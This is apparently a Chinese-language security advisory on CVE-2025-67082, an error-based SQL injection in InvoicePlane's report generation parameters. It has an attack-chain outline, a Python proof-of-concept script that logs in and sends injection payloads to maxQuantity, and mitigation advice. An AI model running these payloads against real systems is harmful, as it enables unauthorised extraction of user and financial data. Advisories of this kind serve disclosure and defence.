CVE-2025-67082: InvoicePlane maxQuantity/minQuantity参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-67082

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

InvoicePlane

漏洞概述

CVE-2025-67082是InvoicePlane应用程序中的一个中等严重性SQL注入漏洞。InvoicePlane是一款流行的开源发票管理应用程序。该漏洞存在于生成报告功能中的maxQuantity和minQuantity参数，由于对这些参数的用户输入消毒不足，攻击者可以通过在参数中注入单引号来执行错误基于SQL注入攻击。成功利用此漏洞需要攻击者具有低权限用户身份，但无需任何用户交互即可发动攻击。攻击者可以利用此漏洞从数据库中提取任意数据，包括敏感的用户信息、财务数据、业务机密等。该漏洞的CVSS评分为6.5，属于中等严重性级别，主要影响机密性，因为攻击者可以获取高价值的敏感数据。此漏洞影响InvoicePlane 1.6.3及之前的所有版本，强烈建议用户尽快升级到最新版本以修复此安全问题。

技术细节

该SQL注入漏洞源于InvoicePlane在处理报告生成功能时，对maxQuantity和minQuantity参数的用户输入验证不充分。攻击者可以通过在这些参数中注入单引号字符来破坏SQL查询的原有结构，从而执行任意SQL命令。具体来说，当用户提交包含特殊字符的请求时，应用程序未能正确转义或参数化这些输入，导致攻击者可以在SQL查询中注入恶意代码。由于应用程序使用动态SQL构建查询而非使用参数化查询，攻击者可以构造特定的payload来提取数据库中的任意数据。漏洞利用的关键在于单引号的消毒不足，攻击者可以利用这一点构造错误基于的SQL注入攻击，通过观察SQL错误信息来逐步提取数据。这种攻击方式对于有数据库错误回显的系统特别有效，攻击者可以通过构造不同的payload来枚举数据库内容，包括表名、列名和实际数据。

攻击链分析

STEP 1

步骤1

攻击者获取InvoicePlane低权限账户（通过默认密码、暴力破解或社会工程学）

STEP 2

步骤2

攻击者访问报告生成功能页面（通常位于/index.php/reports/generate）

STEP 3

步骤3

攻击者构造包含单引号的恶意payload注入到maxQuantity或minQuantity参数中

STEP 4

步骤4

应用程序将恶意输入拼接到SQL查询中，执行攻击者注入的SQL代码

STEP 5

步骤5

通过观察SQL错误信息，攻击者逐步提取数据库中的敏感数据（用户表、财务数据等）

STEP 6

步骤6

攻击者利用获取的数据进行进一步攻击，如横向移动、身份冒充或数据售卖

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-67082 PoC - InvoicePlane SQL Injection # Target: InvoicePlane <= 1.6.3 # Vector: maxQuantity/minQuantity parameters in report generation TARGET_URL = "http://target-website.com/index.php/reports/generate" USERNAME = "[email protected]" PASSWORD = "password123" def login(session): """Authenticate to InvoicePlane""" login_url = f"{TARGET_URL.replace('/reports/generate', '/session/login')}" data = { "email": USERNAME, "password": PASSWORD } response = session.post(login_url, data=data) return "login_success" in response.text or response.status_code == 200 def exploit_sql_injection(session): """Execute SQL injection via maxQuantity parameter""" # Error-based SQL injection payload to extract database version # The single quote breaks the original query, enabling injection payload = "1' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END) AND '1'='1" data = { "reportType": "inventory", "maxQuantity": payload, "minQuantity": "0", "submit": "Generate" } try: response = session.post(TARGET_URL, data=data, timeout=10) if response.status_code == 200: # Check for SQL error messages indicating successful injection if "Division by 0" in response.text or "SQLSTATE" in response.text: print("[+] SQL Injection successful - Error-based extraction possible") return True return False except Exception as e: print(f"[-] Error: {e}") return False def extract_data(session): """Extract database information using error-based SQL injection""" # Payload to extract database user payloads = [ "1' AND (SELECT COUNT(*) FROM users) > 0 AND '1'='1", "1' AND (SELECT SUBSTRING(version(),1,10)) AND '1'='1" ] for payload in payloads: data = { "reportType": "inventory", "maxQuantity": payload, "minQuantity": "0" } response = session.post(TARGET_URL, data=data) # Process response to extract data print(f"[*] Payload sent: {payload}") if __name__ == "__main__": session = requests.Session() print("[*] Starting CVE-2025-67082 exploitation...") if login(session): print("[+] Authentication successful") if exploit_sql_injection(session): print("[+] SQL Injection confirmed") extract_data(session) else: print("[-] Authentication failed")

影响范围

InvoicePlane < 1.6.4

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 禁用报告生成功能或限制其访问权限；2) 实施严格的输入验证规则，拒绝包含单引号的请求；3) 配置Web应用防火墙规则阻止已知的SQL注入攻击模式；4) 监控数据库查询日志及时发现异常查询行为；5) 对现有用户密码进行强制重置以防止凭证泄露后的进一步利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67082
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67082
3 Details https://www.cvedetails.com/cve/CVE-2025-67082/
4 VulDB https://vuldb.com/cve/CVE-2025-67082
5 Link https://github.com/InvoicePlane/InvoicePlane
6 Link https://www.helx.io/blog/advisory-invoice-plane/